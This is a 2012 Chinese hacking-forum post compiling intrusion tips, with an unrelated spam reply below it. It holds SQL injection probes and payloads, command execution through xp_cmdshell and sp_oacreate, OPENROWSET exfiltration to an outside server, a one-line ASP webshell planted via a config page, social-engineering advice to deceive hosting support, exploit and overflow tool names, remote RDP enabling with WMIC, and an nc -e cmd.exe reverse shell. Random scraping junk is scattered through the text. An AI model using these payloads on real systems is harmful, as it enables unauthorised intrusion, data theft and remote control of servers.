找回密码
 立即注册
查看: 4297|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
SA点数据库分离技术相关, d0 o. O1 c: ?3 \, j% o1 e/ r

& ?! V, b5 b4 C" y2 d" J2 E
: o! s( Y3 m4 T# y  N# W0 NSA点数据库分离搞法+语句:
7 o$ t7 `2 K4 N$ k
. a; U8 Q4 h# P4 g  X注射点不显错,执行下面三条语句页面都返回正常。3 A2 f, q4 I! l
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')# W5 w) z; K! W7 k: F. S
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask'); R' }5 c- U6 Z% V
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')/ G+ F6 N: q& C; p9 H5 k
可以列目录,判断系统为2000,web与数据库分离
" b4 S7 V; j; W遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
, A  Q) j1 x5 P3 m- `- o在注射点上执行" |# N& U8 l- C+ o$ b$ ^" @$ r- Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
( E" R/ ]5 C9 {! I) X7 d; T页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
& \: i; l$ I/ Q3 v还有我用NC监听得其他端口都没有得到IP。& |3 N5 K  Y! {1 d; |

: k' \0 e3 j4 ]9 b5 `0 b通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
8 G  l& g% ?+ P  f'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--& [3 {/ `8 ?6 X, A( B" F

( b! Q/ s) u. o8 E* x/ {8 m;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--- I- [( M- m' `; |' _
  t3 E! _5 e* {5 p2 y/ H- X7 R, J
现在就猜想是不是数据库是内网而且不能连外网。
0 }. K8 d# I; K- z. f. N# Q' ^7 ^4 K! K1 T* r1 |: X; N

) U" L3 r( l& w4 C  Gaccess导出txt文本代码
2 n! f: m& q& u+ ?+ v1 P. wSELECT * into [test.txt] in 'd:\web\' 'text;' from admin1 ^) U# s( I- F9 t) M: p/ f
, A4 R2 Y$ K- B# `1 B

" R: v2 w7 _6 B4 `. t
9 S4 ~- x4 D: F' P; N自动跳转到指定网站代码头1 ]# {1 [2 F" W# {) X
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>6 `7 c  u  h8 p
- M' g3 x/ B! @0 c7 i; U

) L* ~+ S: {* h入侵java or jsp站点时默认配置文件路径:
7 B& d0 T, c' Q5 m3 o\web-inf\web.xml8 o5 ?5 s* j/ ?) X1 G* w
tomcat下的配置文件位置:+ ]* p& Y3 [2 y8 a9 N
\conf\server.xml            (前面加上tomcat路径)" c6 n- y" L1 Z, A: T4 W
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
/ t2 N6 l5 p3 j$ ^2 F3 P" _. _( f

" X0 R1 z7 O- r, n5 [; q4 @* o% l: _9 b
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
( A9 I8 K7 d9 L. @( P1 i2 |-1%23. w6 h3 P+ i! _% O9 q3 g1 L
>
7 G% B) Q3 U1 u: \<
0 w- z% e5 U7 m1 e3 h1'+or+'1'='14 c' \: l2 U! V4 N) ?
id=8%bf
8 E) J! T2 [: u  ]( U/ Y* P+ E9 M' T8 ]8 ^2 Y. k
全新注入点检测试法:
; D. V: N5 z; k, R+ A" n在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。( F4 v- |1 z; o5 U. i2 ?) ?
4 |5 {' B; E: }. k- Z$ z  B
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。' V. i6 V* B, F# I  l4 s5 ]

' U( c3 x! x$ L6 |" P- ]搜索型注入判断方法:
( w' u: ?: b3 x+ M( c北京%' and '1'='1' and '%'='" _4 O& S4 T7 [; n2 ^4 a+ ?. w# [  {
北京%' and '1'='2' and '%'='7 ~  v" g0 A5 F% v$ C
! k- ?- G2 }9 s- v
/ p6 a& x; ^9 S# Z8 n
COOKIES注入:
/ O7 C1 z% T" a$ X7 W2 G3 j
+ \* Z, x3 E2 w7 Q+ h% }javascript:alert(document.cookie="id="+escape("51 and 1=1"));1 j2 }2 t$ |# n6 s( e& ?. F- U

' ~6 x8 N% `/ y& S0 a$ V! S2000专业版查看本地登录用户命令:, v  b& Y/ m+ y8 q
net config workstation
( X7 w: _+ E/ y6 r& P9 t# W" a: ^% u" r( E8 S

9 p( e+ p5 b! h) R2003下查看ipsec配置和默认防火墙配置命令:
# ], S9 k, h0 e: X" Onetsh firewall show config
* ]& F. F. M" |7 ^- Rnetsh ipsec static show all
- r* k) W. N9 f7 w0 ~" L% b2 A1 k5 k: X0 H7 _% t
不指派指定策略命令:
) x# W# _" W3 {netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
  A5 C$ e4 a8 ?  s& p: c( {* @' Pnetsh ipsec static show policy all  显示策略名2 \6 |3 G1 [4 z
/ T* T7 r0 B9 \

) F5 ]! I# T- O9 M猜管理员后台小技巧:
7 e. P1 k$ R  r# e* }- {- f- |  uadmin/left.asp
, D* C2 l% Y, I( R# B+ m/ Zadmin/main.asp5 r2 R( E8 d. M9 }
admin/top.asp9 w; M  G# |( K. o, d2 q
admin/admin.asp 7 i  z8 y2 ?# Y# f; J* c
会现出菜单导航,然后迅雷下载全部链接2 {: p( D9 [+ _: h( m. @0 @

6 @8 A5 _) J/ W( z* \, q* w8 W# X4 m# \6 T
社会工程学:
$ u+ Y+ P6 j  j" U% P, W& o. t8 W用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人: ]! l" H$ q; u' e  p, n
然后去骗客服" t  d: o! k( U) B' |

$ L# i" s1 n7 V2 `# ^+ |* [4 U' x. g3 ^! x) a" \: O& \
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
' T& e# d  Z$ a# N- j/ P! V查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
7 |! B; r7 X& q. G0 s  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
' u+ }5 L. {* r6 V2 f) T; H* T+ Y  n- `/ Y

) q& t3 b3 T; F* o+ w
) X' [# W2 K# g5 G( Q# P0 |) N6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
( I$ F9 N9 Q3 B5 z; W& x
* R3 G2 [( g% o' y5 c
' x4 b# f6 E- N) u5 E8 y5 v- u0 Y1 r6 H( ~9 S5 i0 v
CMD加密注册表位置
* c( F! y& X9 Y) Q+ B(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor9 }1 \9 W/ r! A1 g
AutoRun1 R0 [/ W! Z0 w1 r. j

. ^6 m4 h/ f* g/ b* J# S0 I/ x(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
" L' D7 e# D+ t8 g/ u# wAutoRun
0 M! ^% k. @2 M2 i! j5 t! _0 z- k5 I" s" J% M+ m; i$ Q$ n
+ Y( j8 E6 K$ Y) \/ F
在找注入时搜索Hidden,把他改成test6 q# u8 q0 K% v0 I2 C9 S

# }6 r0 Z! a4 H$ H; z) _% i1 n; M* @& a
$ Z+ B  v) O+ B' x3 \' ^  R
5 C( v8 d, m2 H: \/ ~7 V2 ?7 dmstsc /v:IP /console 3 P: q4 U0 F% l2 ]7 W$ z$ f
# S" s8 F7 \1 P( ]
* w8 i  r7 k3 \8 Y  ]+ B
一句话开3389:) Q% w; l$ ~7 y" I
2 ^! Z# g8 [1 c. p, |  n8 c  s  S
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
' {2 ^4 z# Y0 ^5 y+ [4 i开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.9 \: n) [( v& k" m# c
5 Q& F4 y( e- R# M, [  X
) o! B5 F9 ^9 ?# _6 y
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
( u% p& F- a/ Y& u' z4 XInsert into admin(user,pwd) values('test','test')7 {8 A  l& j2 d, \
2 W6 q  P( D3 W7 y
) e& M. Y+ Y8 l6 ]: l& c
NC反弹
* d, F/ b/ h0 a% ^# S先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   " j& e' ?/ @4 R2 ~- c( _
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)0 i) n" L( ?* C5 |

+ Z* n6 r" u6 `. C, O' v% p# c5 b' ~; I4 Y
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
1 V5 J  b' P1 {2 x4 q/ ~- a. t$ Z1 E5 z' m0 ?
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录; A2 Q0 u: H$ I/ Y% Z2 |+ Z
例如:
( v. `; _" }0 s. x  Dsubst k: d:\www\ 用d盘www目录替代k盘
8 L5 F% P- ~# a0 z5 Gsubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表